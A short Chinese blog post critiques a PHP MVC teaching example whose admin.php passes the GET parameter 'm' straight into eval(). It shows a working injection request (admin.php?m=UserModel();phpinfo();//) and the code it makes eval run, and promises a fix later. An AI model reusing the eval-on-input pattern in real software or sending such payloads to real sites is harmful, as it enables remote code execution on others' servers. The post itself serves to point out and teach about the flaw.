在VeryCD上下载量还挺高的,看说明是老师为了介绍MVC而做的一个例子,从开发的角度来说,本身还是不错的。不过为了图方便,忽视了一些东西,这里小文一篇,是为笔记。
什么是MVC这里就不说了?为了实现单一入口,通常所有的动作(Control)都从一个文件出发。我们来看看他这里是怎么写的(位于根目录下的admin.php):
<?PHP
require(‘init.php’);
eval(‘$action=new ‘.ucfirst(isset($_GET["m"])?$_GET["m"]:"index")."Action();");
$action->run();?>
说明一下,这里包含的init.php文件的主要功能是利用PHP的魔术方法__autoload()来自动载入类文件。于是便有了后面的 $action = new SomeAction(); 这一句来实例化一个动作类。但是很遗憾的是,他为了图方便,而直接使用了eval函数。
“任何输入都是有害的”这句名言在此刻又闪耀出它的光芒~
new后面的字符是通过GET方式传入的,这里的数据输入就是由我控制的,于是可以这样请求
admin.php?m = xxxxx
然后发挥你邪恶的想象力,来做点邪恶的事情吧.
同时找到他存在一个叫UserModel的类.我们可以这样构造
admin.php?m = UserModel();phpinfo();//
于是我们eval中执行的语句变成了
$action=new UserModel();phpinfo();// Action();
代码执行如此产生了.修补方法下次再说..只是觉得培训机构这样出类似的教程教程序ctrl + c 或者 ctrl + v 是很伤的。 hv fun
联系客服